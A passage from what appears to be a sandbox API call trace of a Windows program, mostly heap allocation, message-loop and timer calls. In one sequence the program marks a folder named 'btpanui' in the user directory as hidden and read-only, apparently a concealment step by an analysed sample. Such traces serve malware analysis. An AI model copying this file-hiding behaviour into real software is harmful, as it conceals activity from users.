hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300108 | out: hHeap=0x12c0000) returned 1 [0206.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0206.202] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0206.202] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0206.202] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0206.202] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0206.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff28 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0000 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff28 | out: hHeap=0x12c0000) returned 1 [0206.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0060 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0060 | out: hHeap=0x12c0000) returned 1 [0206.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff50 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff60 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff60 | out: hHeap=0x12c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0206.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffff0 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6980 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effb0 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effb0 | out: hHeap=0x12c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6980 | out: hHeap=0x12c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffff0 | out: hHeap=0x12c0000) returned 1 [0206.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0206.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0090 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00a0 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0090 | out: hHeap=0x12c0000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0206.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0206.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0060 [0206.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0080 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0206.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0206.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0080 | out: hHeap=0x12c0000) returned 1 [0206.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0060 | out: hHeap=0x12c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0206.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffff0 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00b0 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6830 [0206.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00b0 | out: hHeap=0x12c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a88 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff40 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0206.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff40 | out: hHeap=0x12c0000) returned 1 [0206.205] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\btpanui", nBufferLength=0x7fff, lpBuffer=0x7af458, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\btpanui", lpFilePart=0x0) returned 0x1d [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effb0 [0206.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.205] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x7bfa90 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0206.206] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 1 [0206.206] GetFileAttributesW (lpFileName="btpanui" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui")) returned 0x10 [0206.206] GetFileAttributesW (lpFileName="btpanui" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui")) returned 0x10 [0206.206] SetFileAttributesW (lpFileName="btpanui", dwFileAttributes=0x13) returned 1 [0206.207] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effb0 | out: hHeap=0x12c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffff0 | out: hHeap=0x12c0000) returned 1 [0206.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffff0 [0206.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6818 [0206.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effa0 [0206.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effa0 | out: hHeap=0x12c0000) returned 1 [0206.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0206.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffff0 | out: hHeap=0x12c0000) returned 1 [0206.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0206.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0206.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300108 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0030 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0080 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0206.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0080 | out: hHeap=0x12c0000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6830 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efee0 [0206.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300298 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0206.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300298 | out: hHeap=0x12c0000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00c0 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0206.210] GetLastError () returned 0x12 [0206.210] SetLastError (dwErrCode=0x12) [0206.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efee0 | out: hHeap=0x12c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0206.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff28 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff90 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0000 [0206.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0206.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff90 | out: hHeap=0x12c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff28 | out: hHeap=0x12c0000) returned 1 [0206.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6818 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effd0 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0050 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0050 | out: hHeap=0x12c0000) returned 1 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6830 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effd0 | out: hHeap=0x12c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300248 | out: hHeap=0x12c0000) returned 1 [0206.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0206.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0206.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effc0 [0206.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00a0 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effc0 | out: hHeap=0x12c0000) returned 1 [0206.212] CloseHandle (hObject=0x2ac) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bffb0 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffbe0 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300248 | out: hHeap=0x12c0000) returned 1 [0206.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0206.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0206.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0206.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0206.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0206.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0206.213] CloseHandle (hObject=0x2e8) returned 1 [0206.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0206.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0206.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14cffb8 | out: hHeap=0x12c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0206.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffcd0 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300248 | out: hHeap=0x12c0000) returned 1 [0206.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0206.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13025a0 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6878 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13026f0 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd10 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300068 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0206.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0xa03020 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65d8 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff78 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302338 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1311208 | out: hHeap=0x12c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66c8 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffaf0 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: 